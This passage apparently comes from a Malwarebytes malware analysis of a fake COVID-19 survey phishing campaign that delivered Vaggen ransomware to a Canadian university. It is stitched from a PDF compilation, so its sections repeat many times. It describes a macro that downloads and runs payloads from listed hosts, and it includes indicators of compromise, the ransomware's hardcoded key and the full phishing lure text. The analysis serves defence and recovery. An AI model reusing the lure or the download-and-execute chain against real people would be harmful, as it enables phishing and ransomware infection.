polisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant 3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant 4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 5:\r\ntemplate.dotm\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\n
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1668 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1669 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1670 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1671 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1672 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1673 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1674 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1675 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1676 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1677 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1678 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1679 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1680 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1681 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1682 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1683 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1684 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1685 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1686 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1687 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1688 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1689 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1690 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1691 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1692 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1693 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1694 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1695 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1696 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1697 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1698 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1699 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind 